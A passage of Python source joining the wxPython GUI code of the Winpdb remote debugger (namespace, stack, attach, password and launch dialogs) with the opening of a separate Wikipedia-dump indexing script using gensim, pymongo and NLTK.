del self.m_jobs[1:]
(el, filter_level) = self.m_jobs.pop()
rl = self.m_session_manager.get_namespace(el, filter_level)
wx.CallAfter(self.do_update_namespace, rl)
except (rpdb2.ThreadDone, rpdb2.NoThreads):
wx.CallAfter(self.m_tree.DeleteAllItems)
except:
rpdb2.print_debug_exception()
self.m_lock.acquire()
self.m_n_workers -= 1
self.m_lock.release()
def do_update_namespace(self, rl):
self.m_tree.DeleteAllItems()
root = self.m_tree.AddRoot('root')
self.m_tree.SetItemPyData(root, (self.get_root_expr(), False))
self.m_tree.SetItemHasChildren(root, True)
s = [root]
while len(s) > 0:
item = s.pop(0)
self.expand_item(item, rl, item is root)
items = self.get_children(item)
s = items + s
self.m_tree.Refresh()
def get_root_expr(self):
"""
Over-ride in derived classes
"""
pass
class CLocals(CNamespacePanel):
def get_root_expr(self):
return rpdb2.as_unicode('locals()')
class CGlobals(CNamespacePanel):
def get_root_expr(self):
return rpdb2.as_unicode('globals()')
class CException(CNamespacePanel):
def get_root_expr(self):
return rpdb2.RPDB_EXEC_INFO
class CNamespaceViewer(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
self.m_key_map = {}
wx.Panel.__init__(self, *args, **kwargs)
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_NAMESPACE)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_notebook = wx.Notebook(self)
self.m_locals = CLocals(self.m_notebook, session_manager = self.m_session_manager)
self.m_notebook.AddPage(self.m_locals, "Locals")
self.m_globals = CGlobals(self.m_notebook, session_manager = self.m_session_manager)
self.m_notebook.AddPage(self.m_globals, "Globals")
self.m_exception = CException(self.m_notebook, session_manager = self.m_session_manager)
self.m_notebook.AddPage(self.m_exception, "Exception")
self.bind_caption(self.m_notebook)
self.m_locals.bind_caption(self)
self.m_globals.bind_caption(self)
self.m_exception.bind_caption(self)
sizerv.Add(self.m_notebook, 1, wx.EXPAND | wx.ALL, 0)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def _clear(self):
self.m_locals._clear()
self.m_globals._clear()
self.m_exception._clear()
def _disable(self):
self.m_notebook.Disable()
self.m_locals.Disable()
self.m_globals.Disable()
self.m_exception.Disable()
def _enable(self):
self.m_notebook.Enable()
self.m_locals.Enable()
self.m_globals.Enable()
self.m_exception.Enable()
def set_filter(self, filter_level):
self.m_locals.set_filter(filter_level)
self.m_globals.set_filter(filter_level)
self.m_exception.set_filter(filter_level)
def get_local_key(self, _stack):
frame_index = self.m_session_manager.get_frame_index()
c = _stack.get(rpdb2.DICT_KEY_CODE_LIST, [])
key = c[-(1 + frame_index)]
return key
def get_global_key(self, _stack):
frame_index = self.m_session_manager.get_frame_index()
s = _stack.get(rpdb2.DICT_KEY_STACK, [])
key = s[-(1 + frame_index)][0]
return key
def update_namespace(self, _stack):
try:
key = self.get_local_key(_stack)
el = self.m_key_map.get(key, None)
(key0, el0) = self.m_locals.update_namespace(key, el)
self.m_key_map[key0] = el0
key = self.get_global_key(_stack)
el = self.m_key_map.get(key, None)
(key1, el1) = self.m_globals.update_namespace(key, el)
self.m_key_map[key1] = el1
key = 'exception'
el = self.m_key_map.get(key, None)
(key1, el1) = self.m_exception.update_namespace(key, el)
self.m_key_map[key] = el1
except rpdb2.NotAttached:
return
class CStackViewer(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_select_command = kwargs.pop('select_command', None)
wx.Panel.__init__(self, *args, **kwargs)
self.m_suppress_recursion = 0
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_STACK)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_stack = CListCtrl(parent = self, style = wx.LC_REPORT | wx.LC_SINGLE_SEL)
self.bind_caption(self.m_stack)
self.m_stack.InsertColumn(0, HLIST_HEADER_FRAME)
self.m_stack.InsertColumn(1, HLIST_HEADER_FILENAME)
self.m_stack.InsertColumn(2, HLIST_HEADER_LINENO)
self.m_stack.InsertColumn(3, HLIST_HEADER_FUNCTION)
self.m_stack.InsertColumn(4, HLIST_HEADER_PATH)
sizerv.Add(self.m_stack, 1, wx.EXPAND | wx.ALL, 0)
if self.m_select_command:
self.m_stack.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnFrameSelected)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_stack.SetCursor(cursor)
def _clear(self):
self.m_stack.DeleteAllItems()
def _disable(self):
self.m_stack.Disable()
def _enable(self):
self.m_stack.Enable()
def is_selected(self, index):
return self.m_stack.IsSelected(index)
def update_stack_list(self, st):
self.m_stack.DeleteAllItems()
s = st.get(rpdb2.DICT_KEY_STACK, [])
i = 0
while i < len(s):
e = s[-(1 + i)]
filename = e[0]
lineno = e[1]
function = e[2]
if not g_fUnicode:
filename = rpdb2.as_string(filename, wx.GetDefaultPyEncoding())
function = rpdb2.as_string(function, wx.GetDefaultPyEncoding())
index = self.m_stack.InsertStringItem(sys.maxint, repr(i))
self.m_stack.SetStringItem(index, 1, os.path.basename(filename))
self.m_stack.SetStringItem(index, 2, repr(lineno))
self.m_stack.SetStringItem(index, 3, function)
self.m_stack.SetStringItem(index, 4, os.path.dirname(filename))
self.m_stack.SetItemData(index, i)
i += 1
self.m_stack.set_columns_width()
self.m_suppress_recursion += 1
self.m_stack.Select(0)
def select_frame(self, index):
if self.m_suppress_recursion > 0:
self.m_suppress_recursion -= 1
return
if (index < 0) or (index > self.m_stack.GetItemCount()):
return
if self.m_stack.IsSelected(index):
return
self.m_suppress_recursion += 1
self.m_stack.Select(index)
def OnFrameSelected(self, event):
if self.m_suppress_recursion == 0:
self.m_suppress_recursion += 1
self.m_select_command(event)
else:
self.m_suppress_recursion -= 1
event.Skip()
class CHTMLDialog(wx.Dialog):
def __init__(self, parent, title, text):
wx.Dialog.__init__(self, parent, -1, title)
sizerv = wx.BoxSizer(wx.VERTICAL)
self.m_html = wx.html.HtmlWindow(self, -1, size = (600, -1))
sizerv.Add(self.m_html, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if "gtk2" in wx.PlatformInfo:
self.m_html.SetStandardFonts()
self.m_html.SetPage(self.get_html_text(text))
ir = self.m_html.GetInternalRepresentation()
self.m_html.SetSize((ir.GetWidth() + 25, min(500, ir.GetHeight() + 25)))
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
btnsizer.AddButton(self.m_ok)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
self.CentreOnParent(wx.BOTH)
def get_html_text(self, text):
tl = text.split('\n')
t = '<br>'.join(tl)
return ABOUT_HTML_PREFIX + t + ABOUT_HTML_SUFFIX
class CListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):
def __init__(self, *args, **kwargs):
wx.ListCtrl.__init__(self, *args, **kwargs)
listmix.ListCtrlAutoWidthMixin.__init__(self)
def set_columns_width(self):
n = self.GetColumnCount()
for i in range(0, n - 1):
self.SetColumnWidth(i, wx.LIST_AUTOSIZE_USEHEADER)
if wx.Platform != '__WXMSW__':
a = [self.GetColumnWidth(i) for i in range(0, n - 1)]
for i in range(0, n - 1):
self.SetColumnWidth(i, wx.LIST_AUTOSIZE)
b = [self.GetColumnWidth(i) for i in range(0, n - 1)]
c = [max(i) for i in zip(a, b)]
for i in range(0, n - 1):
self.SetColumnWidth(i, c[i])
self.resizeLastColumn(50)
class CAttachDialog(wx.Dialog, CJobs):
def __init__(self, parent, session_manager):
wx.Dialog.__init__(self, parent, -1, DLG_ATTACH_TITLE)
CJobs.__init__(self)
self.init_jobs()
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.m_session_manager = session_manager
self.m_async_sm = CAsyncSessionManager(self.m_session_manager, self)
self.m_server_list = None
self.m_errors = {}
self.m_index = None
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_ATTACH_DESC, size = (350, -1))
try:
label.Wrap(350)
except:
label.SetLabel(STATIC_ATTACH_DESC_SPLIT)
sizerv.Add(label, 0, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_ATTACH_HOST)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
host = self.m_session_manager.get_host()
self.m_entry_host = wx.TextCtrl(self, value = host, size = (200, -1))
self.m_entry_host.SetFocus()
sizerh.Add(self.m_entry_host, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btn = wx.Button(self, label = BUTTON_ATTACH_REFRESH)
self.Bind(wx.EVT_BUTTON, self.do_refresh, btn)
btn.SetDefault()
sizerh.Add(btn, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_listbox_scripts = CListCtrl(parent = self, style = wx.LC_REPORT | wx.LC_SINGLE_SEL, size = (-1, 300))
self.m_listbox_scripts.InsertColumn(0, HLIST_HEADER_PID + ' ')
self.m_listbox_scripts.InsertColumn(1, HLIST_HEADER_FILENAME)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected, self.m_listbox_scripts)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected, self.m_listbox_scripts)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnItemActivated, self.m_listbox_scripts)
sizerv.Add(self.m_listbox_scripts, 0, wx.EXPAND | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
wx.CallAfter(self.init2)
def init2(self):
pwd = self.m_session_manager.get_password()
if pwd is not None:
self.do_refresh()
return
pwd_dialog = CPwdDialog(self, pwd)
pos = self.GetPositionTuple()
pwd_dialog.SetPosition((pos[0] + 50, pos[1] + 50))
r = pwd_dialog.ShowModal()
if r != wx.ID_OK:
pwd_dialog.Destroy()
self.Close()
return
pwd = pwd_dialog.get_password()
pwd_dialog.Destroy()
try:
self.m_session_manager.set_password(pwd)
except rpdb2.AlreadyAttached:
assert(0)
self.Close()
return
self.do_refresh()
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_listbox_scripts.SetCursor(cursor)
def OnCloseWindow(self, event):
self.shutdown_jobs()
event.Skip()
def get_server(self):
return self.m_server_list[self.m_index]
def do_refresh(self, event = None):
host = self.m_entry_host.GetValue()
if host == '':
host = 'localhost'
host = rpdb2.as_unicode(host, wx.GetDefaultPyEncoding())
f = lambda r, exc_info: self.callback_sethost(r, exc_info, host)
self.m_async_sm.with_callback(f).set_host(host)
def callback_sethost(self, r, exc_info, host):
(t, v, tb) = exc_info
if t == socket.gaierror:
dlg = wx.MessageDialog(self, rpdb2.MSG_ERROR_HOST_TEXT % (host, v), MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
host = self.m_session_manager.get_host()
self.m_entry_host.SetValue(host)
return
elif t != None:
self.m_session_manager.report_exception(t, v, tb)
return
self.m_async_sm.with_callback(self.update_body).calc_server_list()
def update_body(self, r, exc_info):
(t, v, tb) = exc_info
if t != None:
if t == rpdb2.FirewallBlock:
dlg = wx.MessageDialog(self, rpdb2.STR_FIREWALL_BLOCK, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
self.m_session_manager.report_exception(t, v, tb)
return
(self.m_server_list, self.m_errors) = r
if len(self.m_errors) > 0:
for k, el in self.m_errors.items():
if k in [rpdb2.AuthenticationBadData, rpdb2.AuthenticationFailure]:
self.report_attach_warning(rpdb2.STR_ACCESS_DENIED)
elif k == rpdb2.EncryptionNotSupported:
self.report_attach_warning(rpdb2.STR_DEBUGGEE_NO_ENCRYPTION)
elif k == rpdb2.EncryptionExpected:
self.report_attach_warning(rpdb2.STR_ENCRYPTION_EXPECTED)
elif k == rpdb2.BadVersion:
for (t, v, tb) in el:
self.report_attach_warning(rpdb2.STR_BAD_VERSION % {'value': v})
self.m_ok.Disable()
host = self.m_session_manager.get_host()
self.m_entry_host.SetValue(host)
self.m_listbox_scripts.DeleteAllItems()
for i, s in enumerate(self.m_server_list):
index = self.m_listbox_scripts.InsertStringItem(sys.maxint, repr(s.m_pid))
filename = s.m_filename
if not g_fUnicode:
filename = rpdb2.as_string(filename, wx.GetDefaultPyEncoding())
self.m_listbox_scripts.SetStringItem(index, 1, filename)
self.m_listbox_scripts.SetItemData(index, i)
self.m_listbox_scripts.set_columns_width()
def report_attach_warning(self, warning):
dlg = wx.MessageDialog(self, warning, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
def OnItemSelected(self, event):
self.m_index = event.m_itemIndex
self.m_ok.Enable()
event.Skip()
def OnItemDeselected(self, event):
if self.m_listbox_scripts.GetSelectedItemCount() == 0:
self.m_ok.Disable()
event.Skip()
def OnItemActivated(self, event):
self.m_index = event.m_itemIndex
self.EndModal(wx.ID_OK)
class CExpressionDialog(wx.Dialog):
def __init__(self, parent, default_value):
wx.Dialog.__init__(self, parent, -1, DLG_EXPR_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_EXPR)
sizerv.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_EXPR)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if not g_fUnicode:
default_value = rpdb2.as_string(default_value, wx.GetDefaultPyEncoding())
self.m_entry_expr = wx.TextCtrl(self, value = default_value, size = (200, -1))
self.m_entry_expr.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_expr)
sizerh.Add(self.m_entry_expr, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def get_expression(self):
expr = self.m_entry_expr.GetValue()
expr = rpdb2.as_unicode(expr, wx.GetDefaultPyEncoding())
return expr
class CEncodingDialog(wx.Dialog):
def __init__(self, parent, current_encoding, current_fraw):
wx.Dialog.__init__(self, parent, -1, DLG_ENCODING_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_ENCODING, size = (300, -1))
try:
label.Wrap(300)
except:
label.SetLabel(STATIC_ENCODING_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_ENCODING)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
encoding = [current_encoding, ''][current_encoding is None]
if not g_fUnicode:
encoding = rpdb2.as_string(encoding, wx.GetDefaultPyEncoding())
self.m_entry_encoding = wx.TextCtrl(self, value = encoding, size = (200, -1))
self.m_entry_encoding.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_encoding)
sizerh.Add(self.m_entry_encoding, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_cb = wx.CheckBox(self, -1, CHECKBOX_ENCODING)
self.m_cb.SetValue(current_fraw)
sizerv.Add(self.m_cb, 0, wx.ALIGN_LEFT | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
self.Bind(wx.EVT_BUTTON, self.do_ok, self.m_ok)
if encoding == '':
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def get_encoding(self):
encoding = self.m_entry_encoding.GetValue()
encoding = rpdb2.as_unicode(encoding, wx.GetDefaultPyEncoding())
return encoding, self.m_cb.GetValue()
def do_validate(self):
encoding, fraw = self.get_encoding()
if encoding == rpdb2.ENCODING_AUTO:
return True
try:
codecs.lookup(encoding)
return True
except:
pass
dlg = wx.MessageDialog(self, rpdb2.STR_ENCODING_BAD, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
return True
def do_ok(self, event):
f = self.do_validate()
if not f:
return
event.Skip()
class CSynchronicityDialog(wx.Dialog):
def __init__(self, parent, current_fsynchronicity):
wx.Dialog.__init__(self, parent, -1, DLG_SYNCHRONICITY_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_SYNCHRONICITY, size = (300, -1))
try:
label.Wrap(300)
except:
label.SetLabel(STATIC_SYNCHRONICITY_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
self.m_cb = wx.CheckBox(self, -1, CHECKBOX_SYNCHRONICITY)
self.m_cb.SetValue(current_fsynchronicity)
sizerv.Add(self.m_cb, 0, wx.ALIGN_LEFT | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def get_synchronicity(self):
return self.m_cb.GetValue()
class CPwdDialog(wx.Dialog):
def __init__(self, parent, current_password):
wx.Dialog.__init__(self, parent, -1, DLG_PWD_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_PWD, size = (300, -1))
try:
label.Wrap(300)
except:
label.SetLabel(STATIC_PWD_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_PWD)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
pwd = [current_password, ''][current_password is None]
if not g_fUnicode:
pwd = rpdb2.as_string(pwd, wx.GetDefaultPyEncoding())
self.m_entry_pwd = wx.TextCtrl(self, value = pwd, size = (200, -1))
self.m_entry_pwd.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_pwd)
sizerh.Add(self.m_entry_pwd, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.SetDefault()
self.Bind(wx.EVT_BUTTON, self.do_ok, self.m_ok)
if pwd == '':
self.m_ok.Disable()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def get_password(self):
pwd = self.m_entry_pwd.GetValue()
pwd = rpdb2.as_unicode(pwd, wx.GetDefaultPyEncoding())
return pwd
def do_validate(self):
if rpdb2.is_valid_pwd(self.get_password()):
return True
dlg = wx.MessageDialog(self, rpdb2.STR_PASSWORD_BAD, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return False
def do_ok(self, event):
f = self.do_validate()
if not f:
return
event.Skip()
class COpenDialog(wx.Dialog):
def __init__(self, parent, fLocal):
wx.Dialog.__init__(self, parent, -1, DLG_OPEN_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_OPEN)
sizerv.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_OPEN)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_entry = wx.TextCtrl(self, size = (200, -1))
self.m_entry.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry)
sizerh.Add(self.m_entry, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if fLocal:
btn = wx.Button(self, label = BUTTON_LAUNCH_BROWSE)
self.Bind(wx.EVT_BUTTON, self.do_browse, btn)
sizerh.Add(btn, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.m_ok = wx.Button(self, wx.ID_OK)
self.m_ok.Disable()
self.m_ok.SetDefault()
btnsizer.AddButton(self.m_ok)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def do_browse(self, event = None):
command_line = self.m_entry.GetValue()
(_path, filename, args) = rpdb2.split_command_line_path_filename_args(command_line)
_abs_path = os.path.abspath(_path)
dlg = wx.FileDialog(self, defaultDir = _abs_path, defaultFile = filename, wildcard = WINPDB_WILDCARD, style = wx.OPEN | wx.CHANGE_DIR)
r = dlg.ShowModal()
if r == wx.ID_OK:
path = dlg.GetPaths()[0]
abs_path = os.path.abspath(path)
if (' ' in abs_path):
abs_path = '"' + abs_path + '"'
else:
abs_path = command_line
dlg.Destroy()
self.m_entry.SetValue(abs_path)
def get_file_name(self):
filename = self.m_entry.GetValue()
filename = rpdb2.as_unicode(filename, wx.GetDefaultPyEncoding())
return filename
class CLaunchDialog(wx.Dialog):
def __init__(self, parent, fchdir = True, command_line = ''):
wx.Dialog.__init__(self, parent, -1, DLG_LAUNCH_TITLE)
sizerv = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, STATIC_LAUNCH_DESC)
sizerv.Add(label, 0, wx.ALIGN_LEFT | wx.ALL, 5)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
label = wx.StaticText(self, -1, LABEL_LAUNCH_COMMAND_LINE)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
if not g_fUnicode:
command_line = rpdb2.as_string(command_line, wx.GetDefaultPyEncoding())
self.m_entry_commandline = wx.TextCtrl(self, value = command_line, size = (200, -1))
self.m_entry_commandline.SetFocus()
self.Bind(wx.EVT_TEXT, self.OnText, self.m_entry_commandline)
sizerh.Add(self.m_entry_commandline, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
btn = wx.Button(self, label = BUTTON_LAUNCH_BROWSE)
self.Bind(wx.EVT_BUTTON, self.do_browse, btn)
sizerh.Add(btn, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.m_cb = wx.CheckBox(self, -1, CHECKBOX_LAUNCH)
self.m_cb.SetValue(fchdir)
sizerv.Add(self.m_cb, 0, wx.ALIGN_LEFT | wx.ALL, 5)
label = wx.StaticText(self, -1, STATIC_LAUNCH_ENV, size = (400, -1))
try:
label.Wrap(400)
except:
label.SetLabel(STATIC_LAUNCH_ENV_SPLIT)
sizerv.Add(label, 1, wx.ALIGN_LEFT | wx.ALL, 5)
btnsizer = wx.StdDialogButtonSizer()
self.m_ok = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.do_ok, self.m_ok)
self.m_ok.SetDefault()
btnsizer.AddButton(self.m_ok)
if command_line == '':
self.m_ok.Disable()
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
sizerv.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnText(self, event):
if event.GetString() == '':
self.m_ok.Disable()
else:
self.m_ok.Enable()
event.Skip()
def do_browse(self, event = None):
command_line = self.m_entry_commandline.GetValue()
(_path, filename, args) = rpdb2.split_command_line_path_filename_args(command_line)
_abs_path = os.path.abspath(_path)
cwd = rpdb2.getcwdu()
dlg = wx.FileDialog(self, defaultDir = _abs_path, defaultFile = filename, wildcard = WINPDB_WILDCARD, style = wx.OPEN | wx.CHANGE_DIR)
r = dlg.ShowModal()
os.chdir(cwd)
if r == wx.ID_OK:
path = dlg.GetPaths()[0]
abs_path = os.path.abspath(path)
if (' ' in abs_path):
abs_path = '"' + abs_path + '"'
else:
abs_path = command_line
dlg.Destroy()
self.m_entry_commandline.SetValue(abs_path)
def do_validate(self):
command_line = self.m_entry_commandline.GetValue()
command_line = rpdb2.as_unicode(command_line, wx.GetDefaultPyEncoding())
(_path, filename, args) = rpdb2.split_command_line_path_filename_args(command_line)
try:
_filename = os.path.join(_path, filename)
abs_path = rpdb2.FindFile(_filename)
except IOError:
dlg = wx.MessageDialog(self, MSG_ERROR_FILE_NOT_FOUND, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return False
if ' ' in abs_path:
command_line = ('"' + abs_path + '" ' + args).strip()
else:
command_line = (abs_path + ' ' + args).strip()
self.m_entry_commandline.SetValue(command_line)
return True
def do_ok(self, event):
f = self.do_validate()
if not f:
return
event.Skip()
def get_command_line(self):
command_line = self.m_entry_commandline.GetValue()
command_line = rpdb2.as_unicode(command_line, wx.GetDefaultPyEncoding())
return (command_line, self.m_cb.GetValue())
def StartClient(command_line, fAttach, fchdir, pwd, fAllowUnencrypted, fRemote, host):
sm = rpdb2.CSessionManager(pwd, fAllowUnencrypted, fRemote, host)
try:
app = CWinpdbApp(sm, fchdir, command_line, fAttach, fAllowUnencrypted)
except SystemError:
if os.name == rpdb2.POSIX:
rpdb2._print(STR_X_ERROR_MSG, sys.__stderr__)
sys.exit(1)
raise
if not 'unicode' in wx.PlatformInfo:
dlg = wx.MessageDialog(None, STR_WXPYTHON_ANSI_WARNING_MSG, STR_WXPYTHON_ANSI_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
app.MainLoop()
sm.shutdown()
def main():
if rpdb2.get_version() != "RPDB_2_4_8":
rpdb2._print(STR_ERROR_INTERFACE_COMPATIBILITY % ("RPDB_2_4_8", rpdb2.get_version()))
return
return rpdb2.main(StartClient, WINPDB_TITLE)
def get_version():
return WINPDB_VERSION
if __name__=='__main__':
ret = main()
#
# Debuggee breaks (pauses) here
# before program termination.
#
# You can step to debug any exit handlers.
#
rpdb2.setbreak()
|
indexer.py
|
# Python packages
from __future__ import division
from __future__ import with_statement
import os
import multiprocessing
import threading
import Queue
import logging
import collections
import operator
import codecs
import string
import math
from wiki_dump_reader import page_generator, plain_page_generator
try:
import cPickle as pickle
except ImportError:
import pickle
# External packages and modules
import gensim
try:
import pymongo
except ImportError:
pymongo = None
print """\
WARNING: pymongo package could not be found.
If you are using a SMALL corpus---such as the *Simple English*
version of Wikipedia---and the inverted token index can fit
entirely in memory, then comment out this `raise` line.
Otherwise, please install the PyMongo library!
"""
raise
# pymongo = None # DEBUG: Uncomment to disable (useful for small corpora)
import nltk
from nltk.corpus import stopwords
# Project modules
# *** IMPORTED AT THE END OF THIS FILE ***
# MODULE CONFIGURATION
# How many page worker threads to use
NUMBER_OF_PROCESSES = max(1, multiprocessing.cpu_count() - 1)
# How many pages to send to each worker at a time.
CHUNK_SIZE = 32
# Arbitrary amount
MAX_QUEUE_ITEMS = NUMBER_OF_PROCESSES
# Logging display level
logging.basicConfig(level=logging.DEBUG)
# NLP (NLTK) settings
tokenizer = nltk.tokenize.TreebankWordTokenizer()
#stemmer = nltk.PorterStemmer()
stemmer = None
lemmatizer = nltk.WordNetLemmatizer()
PUNKT_FNAME = "wiki_punkt.pickle"
try:
with open(PUNKT_FNAME, mode='rb') as f:
sent_detector = pickle.load(f)
